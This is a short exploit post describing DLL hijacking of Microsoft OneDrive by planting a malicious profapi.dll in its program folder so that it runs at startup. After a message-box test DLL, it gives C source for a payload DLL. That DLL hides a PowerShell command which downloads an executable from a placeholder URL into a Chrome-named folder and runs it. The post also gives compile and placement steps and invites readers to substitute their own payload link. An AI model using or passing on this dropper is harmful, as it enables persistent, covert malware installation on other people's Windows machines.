ONEDRIVE DLL HIJACKING (profapi.dll)

[bigbl]

INTRO : There is a vulnerability of type DLL HIJACKING in the latest versions of onedrive, this allows to perform actions at the start of the computer because this program is launched automatically on windows 10 and 11, it is also preinstalled.

HOW TO EXPLOIT :

1) Use this code to test the vulnerability

#include <windows.h>

BOOL APIENTRY DllMain( HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call)
    {
        case DLL_PROCESS_ATTACH:
            MessageBoxA(NULL, "Attached", "Attached", MB_OK);
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
        }

        return TRUE;
}

COMPILE WITH : gcc thisfile.cpp -o profapi.dll -shared
Put this dll on : C:\Program Files\Microsoft OneDrive

Restart one drive and you will get :

2) Custom DLL

After many tries, I cooked this code to download a file and run it :

#include <windows.h>

OnedriveMain() {
  wchar_t command[] = L"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe";
  wchar_t args[] = L"-Command Invoke-WebRequest -Uri 'http://linktoyourexe.com/exe.exe' -OutFile \"$env:LOCALAPPDATA\\Chrome\\exe.exe\"; Start-Process \"$env:LOCALAPPDATA\\Chrome\\exe.exe\" -WindowStyle Minimized";
  STARTUPINFOW si;
  PROCESS_INFORMATION pi;

  ZeroMemory(&si, sizeof(si));
  si.cb = sizeof(si);
  ZeroMemory(&pi, sizeof(pi));

  if (!CreateProcessW(command, args, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
    return 1;
  }

  return 0;
}

BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
  switch (dwReason)
  {
    case DLL_PROCESS_ATTACH:
      OnedriveMain();
      break;
  }
  return TRUE;
}

Replace linktoyourexe/exe.exe by your link !

SUGGESTIONS :

If you have any suggestions or improvements to make, I'll be happy to take them into consideration!
If you need help, you can answer here!

Thank you!